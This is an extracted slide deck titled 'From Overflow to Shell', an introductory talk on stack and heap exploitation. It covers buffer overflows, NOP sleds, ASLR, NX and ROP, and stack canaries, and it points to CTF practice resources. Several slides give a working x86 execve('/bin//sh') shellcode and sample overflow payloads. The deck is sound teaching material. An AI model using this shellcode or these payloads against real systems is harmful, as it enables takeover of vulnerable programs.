From Over ow to Shell

Similar documents
Biography. Background

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

Università Ca Foscari Venezia

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

ROP It Like It s Hot!

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated

Writing Exploits. Nethemba s.r.o.

Practical Malware Analysis

This is an example C code used to try out our codes, there several ways to write this but they works out all the same.

Return Oriented Programming

Buffer Overflow Vulnerability

Function Call Convention

Lecture 08 Control-flow Hijacking Defenses

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

Return-orientated Programming

Advanced Buffer Overflow

Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to

ISA564 SECURITY LAB. Shellcode. George Mason University

1 Recommended Readings

idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.

Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2

CSC 405 Computer Security Stack Canaries & ASLR

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

Is stack overflow still a problem?

Program Exploitation Intro

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

Architecture-level Security Vulnerabilities

Assembly Language: Function Calls

CS 241 Honors Security

Advanced Buffer Overflow

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

Buffer Overflow Vulnerability Lab

Buffer Overflow Attack

Assembly Language: Function Calls" Goals of this Lecture"

CS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS

20: Exploits and Containment

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko

Assembly Language: Function Calls" Goals of this Lecture"

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated

Hacking Blind. Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh. Stanford University

Assembly Language: Function Calls. Goals of this Lecture. Function Call Problems

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call

Buffer Overflows Defending against arbitrary code insertion and execution

Introduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins

String Oriented Programming Exploring Format String Attacks. Mathias Payer

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller

Secure Systems Engineering

Exploits and gdb. Tutorial 5

Return oriented programming

The Geometry of Innocent Flesh on the Bone

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

Reverse Engineering II: Basics. Gergely Erdélyi Senior Antivirus Researcher

Buffer-Overflow Attacks on the Stack

Buffer Overflow & Format Strings

Architecture-level Security Vulnerabilities. Julian Stecklina

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

CMPSC 497 Buffer Overflow Vulnerabilities

The IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta

Software Vulnerabilities August 31, 2011 / CS261 Computer Security

Lecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017

Control Hijacking Attacks

Inject malicious code Call any library functions Modify the original code

CSE 565 Computer Security Fall 2018

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

buffer overflow exploitation

CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING

Exercise 6: Buffer Overflow and return-into-libc Attacks

2 Resources Required. 3 Assignment Tasks. 3.1 Initial setup

Topics. What is a Buffer Overflow? Buffer Overflows

CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR

SYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14

Buffer-Overflow Attacks on the Stack

CS 161 Computer Security

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

U23 - Binary Exploitation

Reverse Engineering II: The Basics

Countermeasures in Modern Operating Systems. Yves Younan, Vulnerability Research Team (VRT)

x86 assembly CS449 Fall 2017

Lecture 6: Buffer Overflow. CS 436/636/736 Spring Nitesh Saxena

Rev101. spritzers - CTF team. spritz.math.unipd.it/spritzers.html

Stitching numbers Generating ROP payloads from in memory numbers

Offensive Security My First Buffer Overflow: Tutorial

Smashing the Buffer. Miroslav Štampar

Abstraction Recovery for Scalable Static Binary Analysis

The first Secure Programming Laboratory will be today! 3pm-6pm in Forrest Hill labs 1.B31, 1.B32.

Intro to x86 Binaries. From ASM to exploit

Defeat Exploit Mitigation Heap Attacks. compass-security.com 1

Buffer Overflows. Buffer Overflow. Many of the following slides are based on those from

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena

Lecture 2 Assembly Language

CMSC 313 Lecture 12. Project 3 Questions. How C functions pass parameters. UMBC, CMSC313, Richard Chang

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.

EECE.3170: Microprocessor Systems Design I Summer 2017 Homework 4 Solution

The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler

Transcription:

From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25

Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com Twitter: @zetatwo 2 / 25

Agenda 1. Background 2. Stack based exploitation 3. Protections and bypasses 4. Heap based explotation 5. Next steps 3 / 25

Who are you? Developer Low-level language C, C++ Basic OS 4 / 25

What is an exploit? Unintended behaviour State machine Initial state Reachable state Invalid state Exploit Invalid state "Dangerous" subset Vulnerability Unintended transition (bug) Leading to an exploit 5 / 25

A note on data Bits, groups of bits nibble, byte, word, dword, qword Integer, text, code, addresses 65 66 67 68, "ABCD", inc ecx; inc edx; inc ebx; inc esp, 0x44434241 Same data, different operation Context Endianess, little vs big Little: 0x44332211 = 0x11 0x22 0x33 0x44 Big: 0x44332211 = 0x44 0x33 0x22 0x11 6 / 25

Where are we? Physics Circuits Machine code <-- You are here Assembler Low-level code: C, Rust Mid-level code: Java, C# High-level code: Python, JS 7 / 25

x86 architecture 101 Virtual memory Stack, heap, code 8 / 25

x86 architecture 101 Virtual memory Stack, heap, code General purpose EAX, EBX, ECX, EDX Special purpose EIP, EBP, ESP 9 / 25

Calling convention Architecture specific x86, 32 bit call 0xDEADBEEF... push eip+5 jmp 0xDEADBEEF ret pop eip args in reverse order f(a,b) push b push a call f base pointer 10 / 25

Calling convention Architecture specific x86, 32 bit call 0xDEADBEEF = push eip; jmp 0xDEADBEEF ret = pop eip args in reverse order base pointer 11 / 25

Stack bu er over ow Unchecked write Overwrite adjacent memory Overwrite return address void vuln() { int local1; char buf[16]; fgets(buf); } [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] [AAAABBBBCCCCDDDD][EEEE][FFFF][GGGG]\0... Program received signal SIGSEGV, Segmentation fault. 0x47474747 in example1 () 12 / 25

Shellcode xor push push push mov push push mov mov int Code that launches a shell One of the general goals %eax,%eax %eax $0x68732f2f ; "//sh" $0x6e69622f ; "/bin", "/bin//sh" %esp,%ebx %eax %ebx %esp,%ecx $0xb,%al ; execve $0x80 ; syscall "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 13 / 25

Stack bu er over ow (-96) Unchecked write Overwrite adjacent memory Overwrite return address With shellcode address void vuln() { int local1; char buf[16]; fgets(buf); } [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0xbffffdb4: [31C050682F2F7368682F62696E89E350][5389E1B0][0BCD8000][0xbffffdb4]\0... $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 14 / 25

Shellcode placement Shellcode can be placed at anywhere void vuln() { int local1; char buf[12]; fgets(buf); } [buf (12 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0xbffffdb4: [AAAABBBBCCCCDDDD][EEEE][FFFF][0xbffffdd0]31C050682F2F7368682F62696E89E3505389E1B00BCD8000 $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 15 / 25

Shellcode placement Shellcode can be placed at anywhere Don't need exact location NOP creates margin nop = 0x90 void vuln() { int local1; char buf[12]; fgets(buf); } [buf (12 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0xbffffdb4: [AAAABBBBCCCCDDDD][EEEE][FFFF][0xbffffdd0] 90909090909090909031C050682F2F7368682F62696E89E3505389E1B00BCD8000 $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 16 / 25

Protection: ASLR (-01) Base of stack random Code still static Location unkown Gadget 0x4000104A: jmp esp [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0x????????: [31C050682F2F7368682F62696E89E350][5389E1B0][0BCD8000][0x4000104A] $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 17 / 25

Protection: NX/DEP (-97) Random stack, static code Stack not executable, unkown location Gadgets Return-oriented programming 0x4000104A:... pop eax ret 0x4000106A:... pop ebx pop ecx ret [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0x????????: [AAAA...DDDD][EEEE][FFFF][0x4000104A][0xDEADBEEF][0x4000106A][0xCAFEBABE][0xFEEDF00D] eax = 0xDEADBEEF ebx = 0xCAFEBABE ecx = 0xFEEDF00D 18 / 25

Protection: StackGuard (-98) Prevent the overflow Canary, secret value Controlled crash void vuln() { int local1; char buf[12]; fgets(buf); } void vuln() { push_stack_cookie(); // Compiler int local1; char buf[12]; fgets(buf); check_stack_cookie(); // Compiler } SECRET = 0xfe481ac9 [buf (16 bytes)][local1 (4 bytes)][secret][saved bp (4 bytes)][ret address (4 bytes)] [AAAA...DDDD][EEEE][FFFF][GGGG][0x4000104A] 0x464646466!= 0xfe481ac9 * stack smashing detected :./a.out terminated ======= Backtrace: ========= /lib/i386-linux-gnu/libc-2.27.so ( fortify_fail+0x48) Aborted* 19 / 25

Other topics Format string vulnerability GOT, PLT Protection: RELRO EBP overwrite Create a new fake stack Partial overwrites 0x44434241 = 0x41 0x42 0x43 0x44 0xFF 0x42 0x43 0x44 = 0x444342FF Protection: Control-flow integrity (2014) Bypass: JIT Protection: PAC (2017) Bypass: TBA 20 / 25

Heap exploitation A refresher on memory Physical Virtual Pages Memory allocator libc (malloc/free) other custom 21 / 25

Heap exploitation Heap corruption: application layer Heap overflow Use after free Type confusion 22 / 25

Heap exploitation Heap corruption: memory allocator Re-linking Double free 23 / 25

Heap exploitation Next steps Want try it out? Capture the Flag, CTF https://ctftime.org https://capturetheflag.withgoogle.com Wargames https://picoctf.com http://pwnable.kr https://overthewire.org YouTube LiveOverflow Gynvael Coldwind MurmusCTF ZetaTwo Tools python + pwntools gdb + pwndbg radare2, IDA, binary ninja 24 / 25

Questions? 25 / 25

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback